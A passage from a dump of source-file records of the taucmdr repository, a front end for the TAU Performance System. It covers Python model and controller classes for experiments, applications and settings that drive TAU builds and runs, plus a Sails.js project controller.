True,\n },\n 'target': {\n 'model': 'Target',\n 'required': True,\n },\n 'application': {\n 'model': 'Application',\n 'required': True,\n },\n 'measurement': {\n 'model': 'Measurement',\n 'required': True,\n },\n 'trials': {\n 'collection': 'Trial',\n 'via': 'experiment'\n },\n }\n \n def name(self):\n populated = self.populate()\n return '%s (%s, %s, %s)' % (populated['project']['name'],\n populated['target']['name'],\n populated['application']['name'],\n populated['measurement']['name'])\n\n def prefix(self):\n \"\"\"\n Storage location for all experiment data\n \"\"\"\n populated = self.populate()\n return os.path.join(populated['project'].prefix(),\n populated['target']['name'], \n populated['application']['name'], \n populated['measurement']['name'])\n\n def onCreate(self):\n \"\"\"\n Initialize experiment storage\n \"\"\"\n prefix = self.prefix()\n try:\n util.mkdirp(prefix)\n except:\n raise error.ConfigurationError('Cannot create directory %r' % prefix, \n 'Check that you have `write` access')\n\n def onDelete(self):\n \"\"\"\n Clean up experiment storage\n \"\"\"\n if self.isSelected():\n settings.unset('experiment_id')\n prefix = self.prefix()\n try:\n shutil.rmtree(prefix)\n except Exception as err:\n if os.path.exists(prefix):\n LOGGER.error(\"Could not remove experiment data at '%s': %s\" % (prefix, err))\n\n def select(self):\n if not self.eid:\n raise error.InternalError('Tried to select an experiment without an eid')\n settings.set('experiment_id', self.eid)\n \n def isSelected(self):\n if self.eid:\n return settings.get('experiment_id') == self.eid\n return False\n\n @classmethod\n def getSelected(cls):\n experiment_id = settings.get('experiment_id')\n if experiment_id:\n found = cls.one(eid=experiment_id)\n if not found:\n raise error.InternalError('Invalid experiment ID: %r' % experiment_id)\n return found\n return None\n\n def configure(self):\n \"\"\"\n Installs all software required to perform the experiment\n \"\"\"\n populated = self.populate()\n # TODO: Should install packages in a location where all projects can use\n prefix = populated['project']['prefix']\n target = populated['target'].populate()\n application = populated['application']\n measurement = populated['measurement']\n cc = target['CC']\n cxx = target['CXX']\n fc = target['FC']\n verbose = (logger.LOG_LEVEL == 'DEBUG')\n\n # Configure/build/install PDT if needed\n if not measurement['source_inst']:\n self.pdt = None\n self.bfd = None\n self.libunwind= None\n else:\n pdt = cf.pdt.Pdt(prefix, cxx, target['pdt_source'], target['host_arch'])\n pdt.install()\n self.pdt = pdt\n bfd = cf.bfd.Bfd(prefix, cxx, target['bfd_source'], target['host_arch'])\n bfd.install()\n self.bfd = bfd\n libunwind = cf.libunwind.Libunwind(prefix, cxx, target['libunwind_source'], target['host_arch'])\n libunwind.install()\n self.libunwind = libunwind\n\n # Configure/build/install TAU if needed\n tau = cf.tau.Tau(prefix, cc, cxx, fc, target['tau_source'], target['host_arch'],\n verbose=verbose,\n pdt=pdt,\n bfd=bfd, \n libunwind=libunwind, \n profile=measurement['profile'],\n trace=measurement['trace'],\n sample=measurement['sample'],\n source_inst=measurement['source_inst'],\n compiler_inst=measurement['compiler_inst'],\n # TODO: Library wrapping inst\n openmp_support=application['openmp'], \n openmp_measurements=measurement['openmp'],\n pthreads_support=application['pthreads'], \n pthreads_measurements=None, # TODO\n mpi_support=application['mpi'], \n mpi_measurements=measurement['mpi'],\n cuda_support=application['cuda'],\n cuda_measurements=None, # Todo\n shmem_support=application['shmem'],\n shmem_measurements=None, # TODO\n mpc_support=application['mpc'],\n mpc_measurements=None, # TODO\n memory_support=None, # TODO\n memory_measurements=None, # TODO\n callpath=measurement['callpath'])\n tau.install()\n self.tau = tau\n\n def managedBuild(self, compiler_cmd, compiler_args):\n \"\"\"\n TODO: Docs\n \"\"\"\n self.configure()\n target = self.populate('target')\n measurement = self.populate('measurement')\n given_compiler = Compiler.identify(compiler_cmd)\n target_compiler = target[given_compiler['role']]\n\n # Confirm target supports compiler\n if given_compiler.eid != target_compiler:\n raise error.ConfigurationError(\"Target '%s' is configured with %s compiler '%s', not '%s'\",\n (self['name'], given_compiler['language'], \n given_compiler.absolutePath(),\n target_compiler.absolutePath()),\n \"Use a different target or use compiler '%s'\" %\n target_compiler.absolutePath())\n\n # Build compile-time environment from component packages\n opts, env = environment.base()\n if measurement['source_inst']:\n self.pdt.applyCompiletimeConfig(opts, env)\n self.bfd.applyCompiletimeConfig(opts, env)\n self.tau.applyCompiletimeConfig(opts, env)\n\n use_wrapper = measurement['source_inst'] or measurement['comp_inst']\n if use_wrapper:\n compiler_cmd = given_compiler['tau_wrapper']\n\n cmd = [compiler_cmd] + opts + compiler_args\n retval = util.createSubprocess(cmd, env=env)\n # This would work if TAU's wrapper scripts returned nonzero on error...\n# if retval == 0:\n# LOGGER.info(\"TAU has finished building the application. Now use `tau <command>` to gather data from <command>.\")\n# else:\n# LOGGER.warning(\"TAU was unable to build the application. You can see detailed output in '%s'\" % logger.LOG_FILE)\n return retval\n\n def managedRun(self, application_cmd, application_args):\n \"\"\"\n TODO: Docs\n \"\"\"\n self.configure()\n measurement = self.populate('measurement')\n \n command = util.which(application_cmd)\n if not command:\n raise error.ConfigurationError(\"Cannot find executable: %s\" % application_cmd)\n path = os.path.dirname(command)\n \n # Check for existing profile files\n if measurement['profile']:\n profiles = glob.glob(os.path.join(path, 'profile.*.*.*'))\n if len(profiles):\n LOGGER.warning(\"Profile files found in '%s'! They will be deleted.\" % path)\n for file in profiles:\n try: os.remove(file)\n except: continue\n # Check for existing trace files\n # TODO\n\n # Build environment from component packages\n opts, env = environment.base()\n self.tau.applyRuntimeConfig(opts, env)\n \n # TODO : Select tau_exec as needed\n use_tau_exec = False\n if use_tau_exec:\n # TODO: tau_exec flags and command line args\n cmd = ['tau_exec'] + opts + [application_cmd]\n else:\n cmd = [application_cmd]\n cmd += application_args\n \n return Trial.perform(self, cmd, path, env)\n \n def show(self, trial_numbers=None):\n \"\"\"\n Show most recent trial or all trials with given numbers\n \"\"\"\n self.configure()\n if trial_numbers:\n trials = []\n for n in trial_numbers:\n t = Trial.one({'experiment': self.eid, 'number': n})\n if not t:\n raise error.ConfigurationError(\"No trial number %d in experiment %s\" % (n, self.name()))\n trials.append(t)\n else:\n all_trials = self.populate('trials')\n if not all_trials:\n trials = None\n else:\n latest_date = all_trials[0]['begin_time']\n latest_trial = None\n for trial in all_trials:\n if trial['begin_time'] > latest_date:\n latest_date = trial['begin_time']\n latest_trial = trial\n trials = [trial]\n \n if not trials:\n raise error.ConfigurationError(\"No trials in experiment %s\" % self.name(),\n \"See `tau trial create --help`\")\n \n opts, env = environment.base()\n self.tau.applyRuntimeConfig(opts, env)\n\n for trial in trials:\n prefix = trial.prefix()\n profiles = glob.glob(os.path.join(prefix, 'profile.*.*.*'))\n if not profiles:\n profiles = glob.glob(os.path.join(prefix, 'MULTI__*'))\n if profiles:\n self.tau.showProfile(prefix)\n" }, { "alpha_fraction": 0.6270387172698975, "alphanum_fraction": 0.6278381943702698, "avg_line_length": 33.36263656616211, "blob_id": "311efb289be20da81e485d9be48cbf09beb016b1", "content_id": "fee3f33dfab4a40998d6fe41ff496bab8e71e878", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12508, "license_type": "permissive", "max_line_length": 98, "num_lines": 364, "path": "/packages/tau/controller.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport json\n\n# TAU modules\nimport logger\nimport error\nfrom storage import user_storage\n\n\nLOGGER = logger.getLogger(__name__)\n\n\nclass ModelError(error.InternalError):\n \"\"\"\n Indicates that invalid model data was given.\n \"\"\"\n def __init__(self, model_cls, value):\n super(ModelError, self).__init__(\"Error in model '%s':\\n%s\" % (model_cls.model_name, value))\n self.model_cls = model_cls\n\n\nclass UniqueAttributeError(ModelError):\n def __init__(self, model_cls, unique):\n super(UniqueAttributeError, self).__init__(\n model_cls, 'A record with one of %r already exists' % unique)\n\n\n\nclass Controller(object):\n \"\"\"\n The C\" in MVC\n \n Subclasses reside in the 'model' package and define a member dictionary \n 'attributes' that describes the data model in the form:\n <attribute>: {\n property: value, \n [[property: value], ...]\n }\n \n The 'model' package initializes the set 'references' in each class\n to describe one-sided relationships, e.g.\n Model_A:\n attr_x: { 'model': 'Model_C' }\n Model_B:\n attr_y: { 'model': 'Model_C' }\n Model_C:\n references = set( (Model_A, 'attr_x'), (Model_B, 'attr_y') )\n\n The 'model' package also initializes the dictionary 'associations' in \n each class to describe two-sided relationships, e.g.\n Model_A:\n attr_x: {\n model: Model_B\n via: attr_k\n }\n associations = {attr_x: (Model_B, attr_k)}\n Model_B:\n attr_k: {\n model: Model_A\n }\n associations = {attr_k: (Model_A, attr_x)}\n \"\"\"\n \n # Subclasses override for callback\n def onCreate(self): pass\n def onUpdate(self): pass\n def onDelete(self): pass\n \n def __init__(self, fields):\n self.eid = getattr(fields, 'eid', None)\n self.data = self._validate(fields)\n self.populated = None\n\n def __getitem__(self, key):\n return self.data[key]\n \n def get(self, key, default=None):\n return self.data.get(key, default)\n\n def __repr__(self):\n return json.dumps(repr(self.data))\n\n @classmethod\n def _validate(cls, data, enforce_schema=True):\n \"\"\"\n Validates the given data against the model schema\n \"\"\"\n if data is None:\n return None\n if enforce_schema:\n for key in data:\n if not key in cls.attributes:\n raise ModelError(cls, \"Model '%s' has no attribute named '%s'\" % (cls.model_name, key))\n validated = {}\n for attr, props in cls.attributes.iteritems():\n #\n # TODO: Check types\n #\n # Check required fields and defaults\n try:\n validated[attr] = data[attr]\n except KeyError:\n if 'required' in props:\n raise ModelError(cls, \"'%s' is required but was not defined\" % attr)\n elif 'defaultsTo' in props:\n validated[attr] = props['defaultsTo']\n # Check collections\n if 'collection' in props:\n value = data.get(attr, [])\n if not value:\n value = []\n elif not isinstance(value, list):\n raise ModelError(cls, \"Value supplied for '%s' is not a list: %r\" % (attr, value))\n else:\n for id in value:\n try:\n int(id)\n except ValueError:\n raise ModelError(cls, \"Invalid non-integer ID '%s' in '%s'\" % (id, attr))\n validated[attr] = value\n # Check model associations\n elif 'model' in props:\n value = data.get(attr, None)\n if value is not None:\n try:\n if int(value) != value:\n raise ValueError\n except ValueError:\n raise ModelError(cls, \"Invalid non-integer ID '%s' in '%s'\" % (value, attr))\n validated[attr] = value\n return validated\n \n def populate(self, attribute=None):\n \"\"\"\n Transltes model id numbers in `self` to model controllers and \n returns all data as a dictionary\n \"\"\"\n from tau.model import MODELS\n LOGGER.debug('Populating %r' % self)\n if not self.populated:\n self.populated = dict(self.data)\n for attr, props in self.attributes.iteritems():\n try:\n foreign_model = MODELS[props['model']]\n except KeyError:\n try:\n foreign_model = MODELS[props['collection']]\n except KeyError:\n continue\n else:\n self.populated[attr] = foreign_model.search(eids=self.data[attr])\n else:\n self.populated[attr] = foreign_model.one(eid=self.data[attr])\n if attribute:\n return self.populated[attribute]\n else:\n return self.populated\n \n @classmethod\n def one(cls, keys=None, eid=None):\n \"\"\"\n Return a single record matching all of 'keys' or element id 'eid'\n \"\"\"\n LOGGER.debug(\"Searching '%s' for keys=%r, eid=%r\" % (cls.model_name, keys, eid))\n found = user_storage.get(cls.model_name, keys=keys, eid=eid)\n return cls(found) if found else None\n \n @classmethod\n def all(cls):\n \"\"\"\n Return a list of all records\n \"\"\"\n return [cls(result) for result in user_storage.search(cls.model_name)]\n\n @classmethod\n def search(cls, keys=None, eids=None):\n \"\"\"\n Return a list of records matching all of 'keys' or element id 'eid'\n \"\"\"\n if eids is not None:\n if isinstance(eids, list):\n return [cls.one(eid=id) for id in eids]\n else:\n return [cls.one(eid=eids)]\n elif keys:\n return [cls(record) for record in user_storage.search(cls.model_name, keys=keys)]\n else:\n return cls.all()\n \n @classmethod\n def match(cls, field, regex=None, test=None):\n \"\"\"\n Return a list of records with 'field' matching 'regex' or 'test'\n \"\"\"\n return [cls(record) for record in user_storage.match(cls.model_name, field, regex, test)]\n \n @classmethod\n def exists(cls, keys=None, eids=None):\n \"\"\"\n Return true if a record matching the given keys exists\n \"\"\"\n return user_storage.contains(cls.model_name, keys=keys, eids=eids)\n \n @classmethod\n def create(cls, fields):\n \"\"\"\n Store a new model record and update associations\n \"\"\"\n model = cls(fields)\n unique = dict([(attr, model[attr])\n for attr, props in cls.attributes.iteritems()\n if 'unique' in props])\n if user_storage.contains(cls.model_name, keys=unique, any=True):\n raise UniqueAttributeError(cls, unique)\n with user_storage as storage:\n model.eid = storage.insert(cls.model_name, model.data)\n for attr, foreign in cls.associations.iteritems():\n foreign_model, via = foreign\n if 'model' in model.attributes[attr]:\n foreign_keys = [model.data[attr]]\n elif 'collection' in model.attributes[attr]:\n foreign_keys = model.data[attr]\n model._addTo(foreign_model, foreign_keys, via)\n model.onCreate()\n return model\n \n @classmethod\n def update(cls, fields, keys=None, eids=None):\n \"\"\"\n Change the fields of all records that match the given keys\n and update associations\n \"\"\"\n if eids is not None:\n changing = cls.search(eids=eids)\n elif keys is not None:\n changing = cls.search(keys)\n else:\n raise error.InternalError('Controller.update() requires either keys or eids')\n with user_storage as storage:\n storage.update(cls.model_name, fields, keys=keys, eids=eids)\n for model in changing:\n for attr, foreign in cls.associations.iteritems():\n try:\n new_foreign_keys = set(fields[attr])\n except KeyError:\n continue\n try:\n old_foreign_keys = set(model[attr])\n except KeyError:\n old_foreign_keys = set()\n foreign_model, via = foreign\n added = new_foreign_keys - old_foreign_keys\n deled = old_foreign_keys - new_foreign_keys\n model._addTo(foreign_model, added, via)\n model._removeFrom(foreign_model.search(eids=list(deled)), via)\n model.onUpdate()\n \n @classmethod\n def delete(cls, keys=None, eids=None):\n \"\"\"\n Delete the records that match the given keys and update associations\n \"\"\"\n if eids is not None:\n changing = cls.search(eids=eids)\n elif keys is not None:\n changing = cls.search(keys)\n else:\n raise error.InternalError('Controller.delete() requires either keys or eids')\n with user_storage as storage:\n for model in changing:\n model.onDelete()\n for attr, foreign in cls.associations.iteritems():\n foreign_model, via = foreign\n affected = foreign_model.search(eids=model[attr]) \n LOGGER.debug(\"Deleting %s(eid=%s) affects '%s' in '%s'\" % \n (cls.model_name, model.eid, via, affected))\n model._removeFrom(affected, via)\n for foreign_model, via in cls.references:\n test = lambda x: (model.eid in x if isinstance(x, list) else model.eid == x)\n affected = foreign_model.match(via, test=test)\n LOGGER.debug(\"Deleting %s(eid=%s) affects '%s'\" % (cls.model_name, model.eid, affected))\n model._removeFrom(affected, via)\n return storage.remove(cls.model_name, keys=keys, eids=eids)\n\n def _addTo(self, foreign_cls, keys, attr):\n LOGGER.debug(\"Adding %s to '%s' in %s(eids=%s)\" % \n (self.eid, attr, foreign_cls.model_name, keys))\n with user_storage as storage:\n for key in keys:\n model = foreign_cls.one(eid=key)\n if not model:\n raise ModelError(foreign_cls, \"No record with ID '%s'\" % key)\n if 'model' in model.attributes[attr]:\n updated = self.eid\n elif 'collection' in model.attributes[attr]:\n updated = list(set(model[attr] + [self.eid]))\n storage.update(foreign_cls.model_name, {attr: updated}, eids=key)\n\n def _removeFrom(self, affected, attr):\n LOGGER.debug(\"Removing %s from '%s' in %r\" % (self.eid, attr, affected))\n with user_storage as storage:\n for model in affected:\n if 'model' in model.attributes[attr]:\n if 'required' in model.attributes[attr]:\n LOGGER.debug(\"Empty required attr '%s': deleting %s(eid=%s)\" % \n (attr, model.model_name, model.eid))\n model.delete(eids=model.eid)\n else:\n storage.update(model.model_name, {attr: None}, eids=model.eid)\n elif 'collection' in model.attributes[attr]:\n update = list(set(model[attr]) - set([self.eid]))\n if 'required' in model.attributes[attr] and len(update) == 0:\n LOGGER.debug(\"Empty required attr '%s': deleting %s(eid=%s)\" % \n (attr, model.model_name, model.eid))\n model.delete(eids=model.eid)\n else:\n storage.update(model.model_name, {attr: update}, eids=model.eid)\n\n\n\nclass ByName(object):\n \"\"\"\n Mixin for a model with a unique 'name' field\n \"\"\"\n @classmethod\n def withName(cls, name):\n return cls.one({'name': name})\n" }, { "alpha_fraction": 0.5659229159355164, "alphanum_fraction": 0.5679513216018677, "avg_line_length": 33.387596130371094, "blob_id": "e1e79d9f0e28dc1d80a0cf6f6093c7533a27f0c4", "content_id": "f9d23d87b424502d0fefb517c75d4c8d642a7857", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4437, "license_type": "permissive", "max_line_length": 95, "num_lines": 129, "path": "/packages/tau/model/application.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport string\n\n# TAU modules\nimport controller as ctl\nimport arguments as args\n\n\nclass Application(ctl.Controller, ctl.ByName):\n \"\"\"\n Application data model controller\n \"\"\"\n \n attributes = {\n 'projects': {\n 'collection': 'Project',\n 'via': 'applications'\n },\n 'name': {\n 'type': 'string',\n 'unique': True,\n 'argparse': {'help': 'Application configuration name',\n 'metavar': '<application_name>'}\n },\n 'openmp': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--openmp',),\n 'help': 'application uses OpenMP',\n 'metavar': 'yes/no',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'pthreads': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--pthreads',),\n 'help': 'application uses pthreads',\n 'metavar': 'yes/no',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'mpi': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--mpi',),\n 'help': 'application uses MPI',\n 'metavar': 'yes/no',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'cuda': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--cuda',),\n 'help': 'application uses NVIDIA CUDA',\n 'metavar': 'yes/no',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'shmem': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--shmem',),\n 'help': 'application uses SHMEM',\n 'metavar': 'yes/no',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'mpc': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--mpc',),\n 'help': 'application uses MPC',\n 'metavar': 'yes/no',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n }\n }\n \n _valid_name = set(string.digits + string.letters + '-_.')\n \n def onCreate(self):\n if set(self['name']) > Application._valid_name:\n raise ctl.ModelError('%r is not a valid application name.' % self['name'],\n 'Use only letters, numbers, dot (.), dash (-), and underscore (_).')\n\n" }, { "alpha_fraction": 0.7111727595329285, "alphanum_fraction": 0.7147384881973267, "avg_line_length": 29.792682647705078, "blob_id": "ac888a08e9fa62b5182999bd4b8b3d77e997a09f", "content_id": "20e609b04e97d82ac6c8c968a67e7bd210758d7d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2524, "license_type": "permissive", "max_line_length": 79, "num_lines": 82, "path": "/packages/tau/settings.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# TAU modules\nimport logger\nfrom model.setting import Setting\n\n\nLOGGER = logger.getLogger(__name__)\n\n_data = {}\n\n\ndef _load():\n for record in Setting.all():\n key = record['key']\n val = record['value'] \n _data[key] = val\n LOGGER.debug(\"Loaded settings: %r\" % _data)\n \ndef _save():\n LOGGER.debug(\"Saving settings: %r\" % _data)\n for key, val in _data.iteritems():\n if Setting.exists({'key': key}):\n Setting.update({'value': val}, {'key': key})\n else:\n Setting.create({'key': key, 'value': val})\n\ndef get(key):\n \"\"\"\n Get the value of setting 'key' or None if not set\n \"\"\"\n if not _data: \n _load()\n return _data.get(key, None)\n\ndef set(key, val):\n \"\"\"\n Set setting 'key' to value 'val'\n \"\"\"\n _data[key] = val\n _save()\n \ndef unset(key):\n \"\"\"\n Remove setting 'key' from the list of settings\n \"\"\"\n Setting.delete({'key': key})" }, { "alpha_fraction": 0.5067128539085388, "alphanum_fraction": 0.5067128539085388, "avg_line_length": 21.211538314819336, "blob_id": "73ebd1f8c3c66c8fbfa76de03dd4d23251880a54", "content_id": "a87267b3556dd4eeb8d0dffec08b6094f85c6529", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2309, "license_type": "permissive", "max_line_length": 77, "num_lines": 104, "path": "/commander/api/controllers/ProjectController.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n * ProjectController\n *\n * @description :: Server-side logic for managing projects\n * @help :: See http://links.sailsjs.org/docs/controllers\n */\n\n module.exports = {\n\n view: function(req, res, next) {\n Project.find({}).exec(function (err, projects) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!projects) {\n sails.log.debug('No projects found.');\n return next();\n }\n res.view({\n projects: projects\n });\n });\n },\n\n new: function(req, res, next) {\n res.view();\n },\n\n show: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Project.findOne(id).exec(function (err, project) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!project) {\n sails.log.debug('Project ID '+id+' not found.');\n return next();\n }\n res.view({\n project: project\n });\n });\n },\n\n edit: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Project.findOne(id).exec(function (err, project) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!project) {\n sails.log.debug('Project ID '+id+' not found.');\n return next();\n }\n res.view({\n project: project\n });\n });\n },\n\n create: function(req, res, next) {\n Project.create(req.params.all()).exec(function (err, project) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n res.redirect('/project');\n });\n },\n\n update: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Project.update({id: id}, req.params.all()).exec(function (err, project) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!project) {\n sails.log.debug('Project ID '+id+' not found.');\n return next();\n }\n res.redirect('/project/show/'+id);\n });\n },\n\n destroy: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Project.destroy({id: id}).exec(function (err) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n res.redirect('/project');\n });\n }\n\n};" }, { "alpha_fraction": 0.7621030807495117, "alphanum_fraction": 0.7714731693267822, "avg_line_length": 34.592594146728516, "blob_id": "5dca4d8b12e0c82c2713739868a0d8c367194eda", "content_id": "acc2d36c614a5bae480ff3c0f10b32ea92ca983d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1921, "license_type": "permissive", "max_line_length": 79, "num_lines": 54, "path": "/packages/tau/__init__.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief \n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\n\n\n# Exit codes\nEXIT_FAILURE = -100\nEXIT_WARNING = 100\nEXIT_SUCCESS = 0\n\n# Contact for bugs, etc.\nHELP_CONTACT = '<[email 